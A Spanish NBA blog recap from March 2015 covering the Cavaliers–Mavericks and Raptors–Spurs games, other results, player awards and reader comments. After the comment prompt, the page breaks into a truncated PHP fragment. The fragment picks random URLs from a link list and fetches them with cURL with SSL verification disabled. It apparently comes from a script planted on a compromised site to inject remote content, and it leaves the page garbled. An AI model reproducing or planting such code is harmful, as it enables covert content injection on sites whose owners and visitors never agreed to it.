La Crónica: Maquinarias engrasadas

11 de March de 2015 por txusma

Los dos partidos más atractivos de la jornada, al menos a priori, no hicieron más que confirmar que Cavs y Spurs son ahora mismo maquinarias bien engrasadas, dos artilugios insuperables para equipos en crisis como Mavericks y Raptors. Anoche también se certificó (¡paren las rotativas!) que los Lakers no disputarán los Playoffs 2015, aunque curiosamente lo ‘celebraron’ con una victoria.

Vamos con la crónica.

kawraps

Cleveland Cavaliers 127 – Dallas Mavericks 94

Un asalto le aguantaron los Mavs a los Cavs, y no es ninguna sorpresa. Los texanos son el equipo que más dudas viene ofreciendo de los de la zona noble del Oeste, y ante la visita de uno de los conjuntos más en forma de la liga, las dudas se multiplicaron. La llegada de Rondo no ha tenido los efectos esperados y deseados, y a la falta de química entre varias piezas clave parece sumarse el cansancio de Dirk Nowitzki, muy inefectivo en las últimas semanas. El buen arranque de los Mavs anoche se diluyó en cuanto los Cavs se entonaron. Todo el quinteto titular de Blatt rindió a la perfección y a los Mavs no les quedó más que resguardarse ante el vendaval que se les sobrevino. LeBron, que jugó sin su característica cinta para el pelo, comandó la tunda y se convirtió en el máximo asistente de la historia de los Cavs por delante de Mark Price.

Toronto Raptors 107 – San Antonio Spurs 117

Otro partido que duranto bastantes minutos tuvo aspecto de acabar en paliza fue el que Raptors y Spurs disputaron en el AT&T de San Antonio. El caso es similar al de Cavs y Mavs: dos equipos con trayetorias opuestas evidenciando los momentos que atraviesan. Los Spurs llegaron a dominar por 26 puntos, y eso que a Popovich algo no le gustó de entrada: hizo dos sustituciones en los primeros 67 segundos de partido. Los ajustes debieron funcionar porque los locales firmaron una excelente primera mitad, durante la que volvió a quedar en evidencia que los Raptors distan mucho del equipo que disputaba el primer puesto de la conferencia Este hace un par de meses. Al menos los canadienses reaccionaron tras el intermedio, liderados en esta ocasión por Kyle Lowry en su mejor actuación en muchas semanas. Los Raptors llegaron a reducir la desventaja hasta los 6 puntos (94-100) pero los Spurs vuelven a ser el equipo rocoso al que no le afecta ni un susto como el que se llevaron anoche, cuando Duncan se dañó el codo y, por un momento, se temió lo peor. Con la victoria, la sexta consecutiva, los Spurs superan a los Mavericks en la clasificación del Oeste.

Resto de la jornada

Los Pelicans siguen enganchados a los Thunder en la lucha por la octava plaza. Sin Tyreke Evans, Ryan Anderson ni Holiday, ni siquiera necesitaron una gran actuación de Anthony Davis para ganar con comodidad en Brooklyn (111-91). Los que parecen decididos a garantizarse su presencia en las series por el título son los Pacers, ganadores de seis partidos consecutivos tras aplastar anoche a los Magic (86-118) con Rodney Stuckey estelar. Los Jazz lograron su tercer triunfo seguido al superar a los Knicks (82-87) en un encuentro pésimo salvo por la calidad de Favors y los detalles de Gobert. Y en el Staples se certificó de manera matemática que los Lakers no estarán en Playoffs, y eso pese a que ganaron a los Pistons (85-93). Detroit suma su séptima derrota seguida y un balance de 1-7 desde la adquisición de Reggie Jackson. Hagan sus propios análisis…

PREMIOS

MVP: 34 puntos, 6 rebotes y 7 asistencias saliendo desde el banco. Si alguno pensaba que los mejores tiempos de Rodney Stuckey ya habían pasado estaba muy equivocado. Y es que hay que hacerlo muy bien para dejar una actuación de LeBron James como la de ayer (27 puntos, 7 rebotes y 8 asistencias) en segundo plano.

Rookie: Poquito a poquito parece que Jordan Clarkson va cogiendo hechura de base. Ayer sólo anotó 10 puntos pero repartió 8 asistencias.

Sorpresa: La magia de los Knicks. Aquí cualquiera puede salir y marcarse un partidazo. Ayer fue el turno de Alexey Shved (21 puntos, 10 rebotes y 7 asistencias).

Decepción: Desastroso partido de Reggie Jackson. El hoy en día jugador de los Pistons se quedó en 2 puntos con un 1 de 9 en TC y perdió 5 balones. 

Esfuerzo en vano: Kyle Lowry parece haber vuelto en forma de la lesión que le ha mantenido apartado unos días de las canchas. Fue el que con más ahínco lo intentó de los Raptors (32 puntos, 5 rebotes y 4 asistencias) pero al final no pudo llevarse la victoria.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Azabel dice:
    #1

    y los Pacers empiezan a verse como equipo de PO, y sin George ni Miles, ojo con ellos, si enfrentan a cavs le veo chances casi nulas, pero van a dar batalla y no seran barridos de ninguna manera

      Citar

  2. Nacho dice:
    #2

    Les falta un poco de consistencia a estos Pacers (vale, se que por bajas y demás bla bla bla) Esta vez parece que van más en serio, pero ya han tenido antes rachas buenas que han cerrado con un saco de derrotas. De todas formas siempre me han parecido el equipo más serio del furgón de cola. Menos nombres pero más fondo de armario. Ayer creo que primera vez Rudez titular y respondió bien (creo que porque lo acababa de fichar para la fantasy plus, jajaja)

      Citar

  3. Ruxixón dice:
    #3

    Hombre,apurando a una vuelta de Paul George no parece que vaya a reaparecer a un nivel que pudiera preocupar como podía pasar el año pasado.Quitando Westbrook,que escapa a toda lógica,es el proceso normal de cualquier jugador fuera de las canchas durante tanto tiempo.

    El bajonazo de Dallas puede ser que deban preocuparse,con los Thunder y Pelicans -ole por estos- pujando fuerte en una batalla cara a cara,igual hay daños colaterales como los tejanos no espabilen.La verdad que no sé qué pensar de un tipo como Rondo,en un equipo con aspiraciones y rodeado de gente con buen tiro,experiencia…y él ahí empeñado en quedarse en un jugador del montón a precio de oro.

      Citar

  4. luismi_vallecas dice:
    #4

    El problema de Dallas es que Monta Ellis y Rondo no son compatibles. Los dos necesitan la bola para crear, ninguno puede jugar a quedarse quieto esperando a que les llegue el balón porque no tienen buen tiro exterior. Por eso creo que un base del tipo Calde es perfecto para Dallas, un tío que tenga buena mano de tres y no pida mucha bola. Tal vez, en lugar de Rondo podrían haber intentado conseguir a alguien como Chalmers o incluso Mo Williams

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>